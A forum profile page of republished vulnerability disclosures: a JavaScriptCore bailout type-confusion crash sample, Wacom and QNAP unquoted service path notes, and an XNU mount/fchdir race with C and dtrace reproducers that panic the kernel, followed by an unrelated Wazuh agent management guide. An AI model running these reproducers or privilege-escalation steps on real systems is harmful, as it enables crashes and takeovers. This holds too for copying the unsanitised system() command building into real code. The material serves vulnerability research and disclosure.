
Everything posted by HireHackking
-
JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects
The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds:

function main() {
    const v2 = [1337,1337];
    const v3 = [1337,v2,v2,0];
    Object.__proto__ = v3;
    for (let v10 = 0; v10 < 1000; v10++) {
        function v11(v12,v13) {
            const v15 = v10 + 127;
            const v16 = String();
            const v17 = String.fromCharCode(v10,v10,v15);
            const v19 = Object.shift();
            function v23() {
                let v28 = arguments;
            }
            const v29 = Object();
            const v30 = v23({},129);
            const v31 = [-903931.176976766,v17,,,-903931.176976766];
            const v32 = v31.join("");
            try {
                const v34 = Function(v32);
                const v35 = v34();
                for (let v39 = 0; v39 < 127; v39++) {
                    const v41 = isFinite();
                    let v42 = isFinite;
                    function v43(v44,v45,v46) {
                    }
                    const v47 = v41[4];
                    const v48 = v47[64];
                    const v49 = v35();
                    const v50 = v43();
                    const v51 = v34();
                }
            } catch(v52) {
            }
        }
        const v53 = v11();
    }
}
noDFG(main);
noFTL(main);
main();

Crashes with:

ASSERTION FAILED: cell->inherits(*cell->JSC::JSCell::vm(), std::remove_pointer<T>::type::info())
../../Source/JavaScriptCore/runtime/WriteBarrier.h(58) : void JSC::validateCell(T) [T = JSC::JSFunction *]
1   0x108070cb9 WTFCrash
2   0x103907f0b WTFCrashWithInfo(int, char const*, char const*, int)
3   0x106c0900f void JSC::validateCell<JSC::JSFunction*>(JSC::JSFunction*)
4   0x106c0275f JSC::WriteBarrierBase<JSC::JSFunction, WTF::DumbPtrTraits<JSC::JSFunction> >::set(JSC::VM&, JSC::JSCell const*, JSC::JSFunction*)
5   0x10705a727 JSC::DirectArguments::setCallee(JSC::VM&, JSC::JSFunction*)
6   0x107084753 operationCreateDirectArgumentsDuringExit
7   0x4d8af2e06484
8   0x4d8af2e034c3
9   0x1078661b7 llint_entry
10  0x107848f70 vmEntryToJavaScript
11  0x107740047 JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*)
12  0x10773f650 JSC::Interpreter::executeProgram(JSC::SourceCode const&, JSC::ExecState*, JSC::JSObject*)
13  0x107a9afc5 JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&)
14  0x1039549a6 runWithOptions(GlobalObject*, CommandLine&, bool&)
15  0x10392a10c jscmain(int, char**)::$_4::operator()(JSC::VM&, GlobalObject*, bool&) const
16  0x103909aff int runJSC<jscmain(int, char**)::$_4>(CommandLine const&, bool, jscmain(int, char**)::$_4 const&)
17  0x103908893 jscmain(int, char**)
18  0x10390880e main
19  0x7fff79ad63d5 start

The assertion indicates a type confusion. In particular, setCallee stores a JSCell into a WriteBarrier<JSFunction> which is not actually a JSFunction, triggering this assertion.

Below is my preliminary analysis of the bug.

When DFG compiles v11, it decides to inline v23 and the isFinite function. The relevant parts of the resulting DFG graph (with many omissions) follow:

# Inlined v23
 2  0: --> v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)>
38  2  0: 207:< 1:-> GetScope(Check:Untyped:@169, JS|PureInt, R:Stack(-23), bc#1, ExitValid)
39  2  0: 208:<!0:-> MovHint(Check:Untyped:@207, MustGen, loc30, R:Stack(-23), W:SideState, ClobbersExit, bc#1, ExitValid)
40  2  0: 209:< 1:-> SetLocal(Check:Untyped:@207, loc30(QC~/FlushedJSValue), R:Stack(-23), W:Stack(-31), bc#1, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#3, ExitValid)  predicting None
44  2  0: 213:< 1:-> CreateDirectArguments(JS|PureInt, R:Stack,Stack(-23),HeapObjectCount, W:HeapObjectCount, Exits, ClobbersExit, bc#7, ExitValid)
45  2  0: 214:<!0:-> MovHint(Check:Untyped:@213, MustGen, loc32, R:Stack(-23), W:SideState, ClobbersExit, bc#7, ExitInvalid)
46  2  0: 215:< 1:-> SetLocal(Check:Untyped:@213, loc32(SC~/FlushedJSValue), R:Stack(-23), W:Stack(-33), bc#7, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#9, ExitValid)  predicting None
 2  0: <-- v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)>

 4  0: Block #4 (bc#317): (OSR target)
24  4  0: 322:< 1:-> JSConstant(JS|PureInt, Weak:Object: 0x1078e4000 with butterfly 0x18052e8408 (Structure %C0:global), StructureID: 40546, bc#347, ExitValid)
27  4  0: 325:< 1:-> SetLocal(Check:Untyped:@322, loc30(DE~/FlushedJSValue), W:Stack(-31), bc#347, exit: bc#354, ExitValid)  predicting None

# Inlined isFinite()
 4  0: --> isFinite#DJEgRe:<0x1078a4640 (StrictMode), bc#362, Call, known callee: Object: 0x1078cfd50 with butterfly 0x0 (Structure %Cm:Function), StructureID: 63290, numArgs+this = 1, numFixup = 1, stackOffset = -38 (loc0 maps to loc38)>
37  4  0: 335:< 1:-> JSConstant(JS|PureInt, Undefined, bc#0, ExitValid)
38  4  0: 336:<!0:-> MovHint(Check:Untyped:@322, MustGen, loc32, W:SideState, ClobbersExit, bc#0, ExitValid)
41  4  0: 339:< 1:-> SetLocal(Check:Untyped:@322, loc32(FE~/FlushedJSValue), W:Stack(-33), bc#0, ExitValid)  predicting None

Note that some bytecode registers (locX) are reused to hold different values in this code.

The DFGPhantomInsertionPhase is responsible for identifying bytecode registers (locX) that have to be recovered during a bailout and placing Phantom nodes into the IR to ensure the required DFG values are alive so the bytecode registers can be restored from them. When the DFGPhantomInsertionPhase phase runs on this code and wants to determine the values needed for a bailout somewhere at the start of the try block, it decides that loc32 would have to be restored as it is assigned above but still used further down (in the inlined code of isFinite). As such, it inserts a Phantom node.

When the bailout then actually happens (presumably because the `new Function()` fails), loc32 is attempted to be restored (by then, CreateDirectArguments has been replaced by a PhantomCreateDirectArguments which doesn't actually create the arguments object unless a bailout happens), resulting in a call to operationCreateDirectArgumentsDuringExit. This call requires the value of `callee` as argument. As such, the callee value is reconstructed as well. In the inlined callframe, the callee value is expected to be stored in loc30 (I think). However, by the time the bailout happens, loc30 has been reused, in this case by storing the global object into it. As such, the code that recovers the values (incorrectly) restores the callee value to the global object and passes it to operationCreateDirectArgumentsDuringExit. When this reference is then stored into a WriteBarrier<JSFunction> during a call to setCallee, an assertion is raised in debug builds.

It is not clear to me at which point a different decision should have been made here. Unfortunately, it is quite tedious to manually modify this sample as most changes to it will quickly break the specific bytecode register allocation outcome required to trigger the bug.

I could imagine this bug to be exploitable if the invalid callee value is somehow subsequently accessed by code, e.g. user supplied code, the GC, or other parts of the engine that inspect bytecode registers, and assumed to be a JSFunction*. However, I have not verified that this is possible.
-
Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
# Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
# Discovery by: Marcos Antonio León (psk)
# Discovery Date: 2019-11-04
# Vendor Homepage: https://www.wacom.com
# Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe
# Tested Version: 6.3.7.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 es

# Step to discover Unquoted Service Path:

C:\>sc qc WTabletServicePro
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WTabletServicePro
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
        GRUPO_ORDEN_CARGA  : PlugPlay
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Wacom Professional Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
A successful attempt would require the local attacker to insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
-
macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()
On macOS, when a new mount point is created, the kernel uses checkdirs() to, as a comment above the function explains: "Scan all active processes to see if any of them have a current or root directory onto which the new filesystem has just been mounted. If so, replace them with the new mount point."

In other words, XNU behaves as follows:

$ hdiutil attach ./mount_cwd.img -nomount
/dev/disk2
$ cd mnt
$ ls -l
total 0
-rw-r--r--  1 projectzero  staff  0 Aug  6 18:05 underlying
$ mount -t msdos -o nobrowse /dev/disk2 .
$ ls -l
total 0
-rwxrwxrwx  1 projectzero  staff  0 Aug  6 18:04 onfat
$

(This is different from e.g. Linux, where the cwd would still point to the directory on the root filesystem that is now covered by the mountpoint, and the second "ls -l" would show the same output as the first one.)

checkdirs() uses proc_iterate() to execute checkdirs_callback() on each running process. checkdirs_callback() is implemented as follows:

======================================================
static int
checkdirs_callback(proc_t p, void * arg)
{
    struct cdirargs * cdrp = (struct cdirargs * )arg;
    vnode_t olddp = cdrp->olddp;
    vnode_t newdp = cdrp->newdp;
    struct filedesc *fdp;
    vnode_t tvp;
    vnode_t fdp_cvp;
    vnode_t fdp_rvp;
    int cdir_changed = 0;
    int rdir_changed = 0;

    /*
     * XXX Also needs to iterate each thread in the process to see if it
     * XXX is using a per-thread current working directory, and, if so,
     * XXX update that as well.
     */

    proc_fdlock(p);
    fdp = p->p_fd;
    if (fdp == (struct filedesc *)0) {
        proc_fdunlock(p);
        return(PROC_RETURNED);
    }
    fdp_cvp = fdp->fd_cdir;
    fdp_rvp = fdp->fd_rdir;
    proc_fdunlock(p);

    if (fdp_cvp == olddp) {
        vnode_ref(newdp);
        tvp = fdp->fd_cdir;
        fdp_cvp = newdp;
        cdir_changed = 1;
        vnode_rele(tvp);
    }
    if (fdp_rvp == olddp) {
        vnode_ref(newdp);
        tvp = fdp->fd_rdir;
        fdp_rvp = newdp;
        rdir_changed = 1;
        vnode_rele(tvp);
    }
    if (cdir_changed || rdir_changed) {
        proc_fdlock(p);
        fdp->fd_cdir = fdp_cvp;
        fdp->fd_rdir = fdp_rvp;
        proc_fdunlock(p);
    }
    return(PROC_RETURNED);
}
======================================================

`p->p_fd` contains the current working directory (`->fd_cdir`) and root directory (`->fd_rdir`) of the process; it is protected against modification by proc_fdlock()/proc_fdunlock(). Because checkdirs_callback() does not hold that lock across the entire operation, several races are possible; for example:

 - If `fdp->fd_cdir == olddp` is true and `fdp->fd_cdir` changes between the read `tvp = fdp->fd_cdir;` and the second `proc_fdlock(p);`, `vnode_rele(tvp);` will release a nonexistent reference, leading to reference count underflow.
 - If `fdp->fd_cdir == olddp` is true and the process calls chroot() between the first locked region and the second locked region, a dangling pointer will be written back to `fdp->fd_rdir`.

I have written a simple reproducer for the first scenario; however, since the race window is quite narrow, it uses dtrace to make the race easier to hit (so you have to turn off SIP).

To prepare an empty FAT32 filesystem and the PoC:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ base64 -D | gunzip > mount_cwd.img
[base64-encoded disk image omitted]
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ cat > flipflop2.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>

int main(void) {
  int outer_fd = open(".", O_RDONLY);
  if (outer_fd == -1) err(1, "open outer");
  int inner_fd = open("mnt", O_RDONLY);
  if (inner_fd == -1) err(1, "open inner");
  while (1) {
    if (fchdir(inner_fd)) perror("chdir 1");
    if (fchdir(outer_fd)) perror("chdir 2");
  }
}
Projects-Mac-mini:mount_cwd projectzero$ cc -o flipflop2 flipflop2.c
Projects-Mac-mini:mount_cwd projectzero$ cat > mountloop.c
#include <stdlib.h>
#include <stdio.h>
#include <err.h>

int main(int argc, char **argv) {
  char mount_cmd[1000];
  sprintf(mount_cmd, "mount -t msdos -o nobrowse %s mnt", argv[1]);
  while (1) {
    if (system(mount_cmd) != 0) errx(1, "mount failed");
    umount:;
    if (system("umount mnt")) {
      puts("umount failed");
      goto umount;
    }
  }
}
Projects-Mac-mini:mount_cwd projectzero$ cc -o mountloop mountloop.c
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ cat > test.dtrace
#!/usr/sbin/dtrace -w -s

__mac_mount:entry { mount_pending = 1; }
__mac_mount:return { mount_pending = 0; }
proc_iterate:entry { in_proc_iterate = 1; }
proc_iterate:return { in_proc_iterate = 0; }
vnode_rele_internal:entry {
  if (mount_pending && in_proc_iterate) {
    chill(1000*1000*10);
  }
}
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ chmod +x test.dtrace
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ mkdir mnt
Projects-Mac-mini:mount_cwd projectzero$
======================================================

In one terminal, launch the dtrace script as root:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ sudo ./test.dtrace
dtrace: script './test.dtrace' matched 10 probes
dtrace: allowing destructive actions
======================================================

In a second terminal, set up the loop device and launch the ./flipflop2 helper:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ hdiutil attach ./mount_cwd.img -nomount
/dev/disk2
Projects-Mac-mini:mount_cwd projectzero$ ./flipflop2
======================================================

In a third terminal, launch the ./mountloop helper:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ ./mountloop /dev/disk2
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
[...]
======================================================

(Don't mind the error spew from ./flipflop2 and ./mountloop, that's normal.)

Within a few minutes, the system should panic, with an error report like this:

======================================================
*** Panic Report ***
panic(cpu 0 caller 0xffffff80055f89c5): "vnode_rele_ext: vp 0xffffff80276ee458 kusecount(4) out of balance with usecount(3).  v_tag = 25, v_type = 2, v_flag = 84800."@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.270.47/bsd/vfs/vfs_subr.c:1937
Backtrace (CPU 0), Frame : Return Address
0xffffff911412b9d0 : 0xffffff80053ad6ed mach_kernel : _handle_debugger_trap + 0x47d
0xffffff911412ba20 : 0xffffff80054e9185 mach_kernel : _kdp_i386_trap + 0x155
0xffffff911412ba60 : 0xffffff80054da8ba mach_kernel : _kernel_trap + 0x50a
0xffffff911412bad0 : 0xffffff800535ab40 mach_kernel : _return_from_trap + 0xe0
0xffffff911412baf0 : 0xffffff80053ad107 mach_kernel : _panic_trap_to_debugger + 0x197
0xffffff911412bc10 : 0xffffff80053acf53 mach_kernel : _panic + 0x63
0xffffff911412bc80 : 0xffffff80055f89c5 mach_kernel : _vnode_rele_internal + 0xf5
0xffffff911412bcc0 : 0xffffff8005607f34 mach_kernel : _dounmount + 0x524
0xffffff911412bd60 : 0xffffff8005607877 mach_kernel : _unmount + 0x197
0xffffff911412bf40 : 0xffffff80059b92ad mach_kernel : _unix_syscall64 + 0x27d
0xffffff911412bfa0 : 0xffffff800535b306 mach_kernel : _hndl_unix_scall64 + 0x16

BSD process name corresponding to current thread: umount
Boot args: -zp -v keepsyms=1

Mac OS version:
18G87

Kernel version:
Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/RELEASE_X86_64
Kernel UUID: 982F17B3-0252-37FB-9869-88B3B1C77335
Kernel slide:     0x0000000005000000
Kernel text base: 0xffffff8005200000
__HIB  text base: 0xffffff8005100000
System model name: Macmini7,1 (Mac-35C5E08120C7EEAF)

System uptime in nanoseconds: 390113393507
last loaded kext at 197583647618: com.apple.filesystems.msdosfs 1.10 (addr 0xffffff7f89287000, size 69632)
last unloaded kext at 61646619017: com.apple.driver.AppleIntelLpssGspi 3.0.60 (addr 0xffffff7f88208000, size 45056)
[...]
======================================================
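Added example, not XNU code and not Apple's patch: a deterministic Python model of the lock scope described above. The racy variant mirrors the structure of the quoted checkdirs_callback() (compare under the lock, drop it, re-read and release unlocked, write back later) and is run beside a variant that does the compare-and-swap inside one critical section. Vnode names and reference counts are constructed, and "window" is a hypothetical hook standing in for the moment the other thread's fchdir() runs.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List


class RefcountUnderflow(Exception):
    """Stands in for the 'usecount out of balance' panic shown above."""


@dataclass
class Vnode:
    name: str
    usecount: int = 0


def vnode_ref(vp: Vnode) -> None:
    vp.usecount += 1


def vnode_rele(vp: Vnode) -> None:
    if vp.usecount <= 0:
        raise RefcountUnderflow(f"{vp.name}: releasing a reference nobody holds")
    vp.usecount -= 1


class FdLock:
    """Single-threaded stand-in for proc_fdlock(): a contender that finds the
    lock held is parked and resumed when the holder releases it."""

    def __init__(self) -> None:
        self.held = False
        self.waiters: List[Callable[[], None]] = []

    def acquire(self) -> None:
        self.held = True

    def release(self) -> None:
        self.held = False
        while self.waiters:
            self.waiters.pop(0)()


@dataclass
class Proc:
    fd_cdir: Vnode
    fd_lock: FdLock = field(default_factory=FdLock)


def fchdir_common(p: Proc, newdir: Vnode) -> None:
    """Model of fchdir_common(): swap fd_cdir under the lock, then drop the
    reference the process held on the old cwd."""
    if p.fd_lock.held:                      # contended: resume after unlock
        p.fd_lock.waiters.append(lambda: fchdir_common(p, newdir))
        return
    p.fd_lock.acquire()
    vnode_ref(newdir)
    old, p.fd_cdir = p.fd_cdir, newdir
    p.fd_lock.release()
    vnode_rele(old)


def checkdirs_callback_racy(p, olddp, newdp, window=None):
    """Lock scope of the XNU code quoted above: read under the lock, drop it,
    re-read fd_cdir unlocked, release it, write back under the lock again."""
    p.fd_lock.acquire()
    fdp_cvp = p.fd_cdir
    p.fd_lock.release()
    cdir_changed = False
    if fdp_cvp is olddp:
        vnode_ref(newdp)
        tvp = p.fd_cdir                     # unlocked re-read
        fdp_cvp = newdp
        cdir_changed = True
        if window:
            window()                        # the other thread's fchdir() lands here
        vnode_rele(tvp)                     # drops a reference fchdir() already dropped
    if cdir_changed:
        p.fd_lock.acquire()
        p.fd_cdir = fdp_cvp
        p.fd_lock.release()


def checkdirs_callback_locked(p, olddp, newdp, window=None):
    """Compare, swap and the decision to release all inside one critical
    section: one correct structure, not Apple's actual patch."""
    p.fd_lock.acquire()
    tvp = None
    if p.fd_cdir is olddp:
        vnode_ref(newdp)
        tvp, p.fd_cdir = p.fd_cdir, newdp
        if window:
            window()                        # contender is parked until we unlock
    p.fd_lock.release()
    if tvp is not None:
        vnode_rele(tvp)                     # the reference we took over from the process


def run_scenario(callback) -> Dict:
    """A mount lands on the cwd while the process flips its cwd, as in the PoC."""
    covered = Vnode("mnt", usecount=1)            # held as the process's cwd
    mount_root = Vnode("msdos-root", usecount=1)  # held by the new mount
    outer = Vnode("outer", usecount=1)            # held by flipflop2's open fd
    p = Proc(fd_cdir=covered)
    try:
        callback(p, covered, mount_root, window=lambda: fchdir_common(p, outer))
        panic = None
    except RefcountUnderflow as e:
        panic = str(e)
    return {"panic": panic, "cwd": p.fd_cdir.name,
            "usecount": {v.name: v.usecount for v in (covered, mount_root, outer)}}
```

With the racy callback the model reports an underflow on "mnt" (the reference fchdir() already dropped is dropped again); with the locked callback every count stays balanced and the process ends up on "outer" as it asked.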
-
QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
# Discovery Date: 2019-11-05
# Exploit Author: Ivan Marmolejo
# Vendor Homepage: https://www.qnap.com/en/
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Vulnerability Type: Local
# Tested on: Windows XP Profesional Español SP3

#Exploit

##############################################################################################################################################

Summary: QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable.

Description: The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

##############################################################################################################################################

Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
QNAP Vss Service    QVssService    C:\Archivos de programa\QNAP\NetBak\QVssService.exe    Auto

##############################################################################################################################################

Service info:

C:\Users\user>sc qc QVssService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: QVssService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\QNAP\NetBak\QVssService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : QNAP Vss Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

##############################################################################################################################################
-
Title: Wazuh Agent Management

Agent lifecycle

Registering an agent

Once the agent has been installed on the computer to be monitored, it must be registered with the Wazuh manager in order to establish communication. This can be done from the command line, through authd, or through the RESTful API.

A registered agent remains on the manager until the user removes it. As the following figure shows, an agent is in one of four different states at any time.

Agent status

Never connected: the agent is registered but has not connected to the manager.

Pending: waiting for the authentication process. The manager received a connection request from the agent but nothing else; this may indicate a firewall problem. An agent passes through this state once during its connection lifecycle.

Active: the agent has connected successfully and can now communicate with the manager.

Disconnected: if the manager does not receive any message from the agent within 30 minutes, it considers the agent disconnected.

Removing an agent

The connection lifecycle ends once the agent is removed from the manager. This can be done through the RESTful API, the command line, or authd (when the force option is enabled).

Forcing insertion

If you try to add an agent with an IP address that is already registered to another agent, the manage_agents command returns an error. You can still force the addition with the -f option.

Example: an agent named server1 with IP 10.0.0.10 is installed and has ID 005. Suppose the server has to be reinstalled; the new agent must then be reinstalled and connected to the manager. In this case the parameter -f 0 can be used, meaning that the previous agent (005) is removed (with a backup) and a new agent is re-created with that IP. The new agent gets a new ID.

/var/ossec/bin/manage_agents -n server1 -a 10.10.10.10 -f 0

Listing agents

Run /var/ossec/bin/agent_control to list the connection status of the agents:

[root@wazuh-manage ~]# /var/ossec/bin/agent_control -l

Wazuh agent_control. List of available agents:
   ID: 000, Name: wazuh-manage (server), IP: 127.0.0.1, Active/Local
   ID: 001, Name: agent01, IP: 45.77.105.194, Active
   ID: 002, Name: agent02, IP: 155.138.165.154, Active
   ID: 003, Name: agent03, IP: 45.77.93.54, Active
   ID: 004, Name: agent04, IP: 45.77.4.139, Active

List of agentless devices:

Removing an agent

Run /var/ossec/bin/manage_agents to remove an agent. To confirm before the agent is removed, use the following command:

[root@wazuh-manage ~]# /var/ossec/bin/manage_agents

****************************************
* Wazuh v3.8.0 Agent manager.          *
* The following options are available: *
****************************************
   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.
Choose your action: A,E,L,R or Q: r

Available agents:
   ID: 001, Name: agent01, IP: 45.77.105.194
   ID: 002, Name: agent02, IP: 155.138.165.154
   ID: 003, Name: agent03, IP: 45.77.93.54
   ID: 004, Name: agent04, IP: 45.77.4.139
Provide the ID of the agent to be removed (or '\q' to quit): 004
Confirm deleting it?(y/n): y
Agent '004' removed.

****************************************
* Wazuh v3.8.0 Agent manager.          *
* The following options are available: *
****************************************
   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.
Choose your action: A,E,L,R or Q: q

To remove an agent without confirmation, use the following option:

# /var/ossec/bin/manage_agents -r 001

****************************************
* Wazuh v3.8.0 Agent manager.          *
* The following options are available: *
****************************************
   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.
Choose your action: A,E,L,R or Q:

Available agents:
   ID: 001, Name: new, IP: any
Provide the ID of the agent to be removed (or '\q' to quit): 001
Confirm deleting it?(y/n): y
Agent '001' removed.

** You must restart OSSEC for your changes to take effect.

manage_agents: Exiting.

Listing agent connection status (API)

Request GET /agents to return the list of available agents.

Note: GET is curl's default operation and needs no special flag.

[root@wazuh-manage ~]#
{
  "error": 0,
  "data": {
    "totalItems": 5,
    "items": [
      {
        "status": "Active",
        "name": "wazuh-manage",
        "ip": "127.0.0.1",
        "manager": "wazuh-manage",
        "node_name": "node01",
        "dateAdd": "2019-01-21 09:58:43",
        "version": "wazuh v3.8.0",
        "lastKeepAlive": "9999-12-31 23:59:59",
        "os": {
          "major": "7",
          "name": "centos linux",
          "uname": "linux | wazuh-manage | 3.10.0-957.1.3.el7.x86_64 | #1 smp thu nov 29 14:49:43 UTC 2018 | x86_64",
          "platform": "centos",
          "version": "7",
          "codename": "core",
          "arch": "x86_64"
        },
        "id": "000"
      },
      {
        "status": "Active",
        "configSum": "AB73AF41699F13FDD81903B5F23D8D00",
        "group": ["default"],
        "name": "agent01",
        "mergedSum": "f8d49771911ed9d5c45b03a40babd065",
        "ip": "45.77.105.194",
        "manager": "wazuh-manage",
        "node_name": "node01",
        "dateAdd": "2019-01-22 07:14:26",
        "version": "wazuh v3.8.0",
        "lastKeepAlive": "2019-01-22 18:11:46",
        "os": {
          "major": "16",
          "name": "ubuntu",
          "uname": "linux | Agent01 | 4.4.0-137-Generic | #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018 | X86_64",
          "platform": "ubuntu",
          "version": "16.04.5 LTS",
          "codename": "Xenial Xerus",
          "arch": "x86_64",
          "minor": "04"
        },
        "id": "001"
      },
      {
        "status": "Active",
        "configSum": "AB73AF41699F13FDD81903B5F23D8D00",
        "group": ["default"],
        "name": "agent02",
        "mergedSum": "f8d49771911ed9d5c45b03a40babd065",
        "ip": "155.138.165.154",
        "manager": "wazuh-manage",
        "node_name": "node01",
        "dateAdd": "2019-01-22 09:29:21",
        "version": "wazuh v3.8.0",
        "lastKeepAlive": "2019-01-22 18:11:39",
        "os": {
          "major": "16",
          "name": "ubuntu",
          "uname": "linux | Agent02 | 4.4.0-137-Generic | #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018 | X86_64",
          "platform": "ubuntu",
          "version": "16.04.5 LTS",
          "codename": "Xenial Xerus",
          "arch": "x86_64",
          "minor": "04"
        },
        "id": "002"
      },
      {
        "status": "Active",
        "configSum": "AB73AF41699F13FDD81903B5F23D8D00",
        "group": ["default"],
        "name": "agent03",
        "mergedSum": "f8d49771911ed9d5c45b03a40babd065",
        "ip": "45.77.93.54",
        "manager": "wazuh-manage",
        "node_name": "node01",
        "dateAdd": "2019-01-22 10:15:26",
        "version": "wazuh v3.8.0",
        "lastKeepAlive": "2019-01-22 18:11:42",
        "os": {
          "major": "16",
          "name": "ubuntu",
          "uname": "linux | Agent03 | 4.4.0-137-Generic | #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018 | X86_64",
          "platform": "ubuntu",
          "version": "16.04.5 LTS",
          "codename": "Xenial Xerus",
          "arch": "x86_64",
          "minor": "04"
        },
        "id": "003"
      },
      {
        "status": "Active",
        "configSum": "AB73AF41699F13FDD81903B5F23D8D00",
        "group": ["default"],
        "name": "agent04",
        "mergedSum": "f8d49771911ed9d5c45b03a40babd065",
        "ip": "45.77.4.139",
        "manager": "wazuh-manage",
        "node_name": "node01",
        "dateAdd": "2019-01-22 10:34:01",
        "version": "wazuh v3.8.0",
        "lastKeepAlive": "2019-01-22 18:11:43",
        "os": {
          "major": "16",
          "name": "ubuntu",
          "uname": "linux | Agent04 | 4.4.0-137-Generic | #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018 | X86_64",
          "platform": "ubuntu",
          "version": "16.04.5 LTS",
          "codename": "Xenial Xerus",
          "arch": "x86_64",
          "minor": "04"
        },
        "id": "004"
      }
    ]
  }
}

Removing an agent (API)

To remove the given agent, request DELETE /agents/:agent_id.

[root@wazuh-manage ~]#
{"error":0,"data":{"msg":"All selected agents were removed","affected_agents":["003"]}}

Using the Wazuh app

Listing agents: by going to the Agents tab of the Wazuh app you can list and view basic information about all registered agents.

Displaying an agent: clicking an agent shows detailed information about it.

Checking the connection to the manager

Before checking the connection between the agent and the manager, first make sure the agent points to the manager's IP address. This is set in ossec.conf using the client XML tag; see the client reference for details.

<ossec_config>
  <client>
    <server>
      <address>149.248.9.0</address>
      <protocol>udp</protocol>
    </server>
  </client>
</ossec_config>

This sets 149.248.9.9 as the Wazuh manager server. After doing this, the agent must be restarted.

a. For systemd:
# systemctl restart wazuh-agent

b. For SysV init:
# service wazuh-agent restart

Once the agent is registered and has connected successfully, you can list the agents' connections to the manager:

[root@wazuh-manage ~]# /var/ossec/bin/agent_control -lc    # on the manager

Wazuh agent_control. List of available agents:
   ID: 000, Name: wazuh-manage (server), IP: 127.0.0.1, Active/Local
   ID: 001, Name: agent01, IP: 45.77.105.194, Active
   ID: 002, Name: agent02, IP: 155.138.165.154, Active

You can also check whether the agent is connected correctly by verifying that a UDP connection to the manager is established:

root@agent02:~# netstat -vatunp | grep ossec-agentd    # on the agent
udp        0      0 155.138.165.154:58599   149.248.9.0:1514   ESTABLISHED 5088/ossec-agentd

The result should match the IP addresses of the agent and the manager.

In the agent_control section you can find information about the status of the agents registered with the manager.

Grouping agents

New in version 3.0.0.

There are two ways to configure registered agents: locally, using the ossec.conf file, or remotely, using centralized configuration. When using centralized configuration, agents can be assigned to groups, each with a unique configuration. This greatly simplifies the whole configuration process.

Unless otherwise specified, every new agent automatically belongs to the "default" group. This group is created during installation and its configuration files are placed in the /var/ossec/etc/shared/default/ folder. These files are pushed from the manager to every agent that belongs to the group.
